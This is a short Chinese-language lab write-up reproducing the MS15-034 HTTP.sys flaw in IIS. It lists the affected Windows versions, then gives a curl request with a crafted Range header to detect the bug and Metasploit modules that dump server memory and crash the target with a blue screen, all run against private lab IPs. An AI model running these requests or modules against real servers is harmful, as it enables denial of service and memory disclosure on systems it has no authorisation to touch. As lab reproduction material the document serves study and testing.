漏洞信息:
    利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。
    影响范围

    Microsoft Windows Server 2012 R2
    
    Microsoft Windows Server 2012 R2(服务器核心安装)
    
    Microsoft Windows Server 2012
    
    Microsoft Windows Server 2012(服务器核心安装)
    
    Microsoft Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1
    
    Microsoft Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1  
    
    Microsoft Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1(服务器核心安装)
    
    Microsoft Windows Server 2008 SP2
    
    Microsoft Windows 8.1
    
    Microsoft Windows 8
    
    Microsoft Windows 7

    复现环境:
    攻击机:kali linux 192.168.1.101
    目标机:Windows 2008 Server R2 IIS7.5 192.168.1.109
    复现过程:
    1.测试是否存在该漏洞:
    先发送一条测试请求

    curl http://192.168.1.109 -H "Host: 192.168.1.109" -H "Range: bytes=0-18446744073709551615"

    效果如下:
    1.png
    如果出现Requested Range Not Satisfiable就说明可能存在该漏洞
    2.验证是否真的存在该漏洞
    打开msf

    use auxiliary/scanner/http/ms15_034_http_sys_memory_dump

    设置RHOSTS后run
    2.png
    扫描说这个IP是脆弱的,漏洞真实存在
    3.开始进行攻击

    use auxiliary/dos/http/ms15_034_ulonglongadd

    设置RHOSTS后run
    3.png
    攻击成功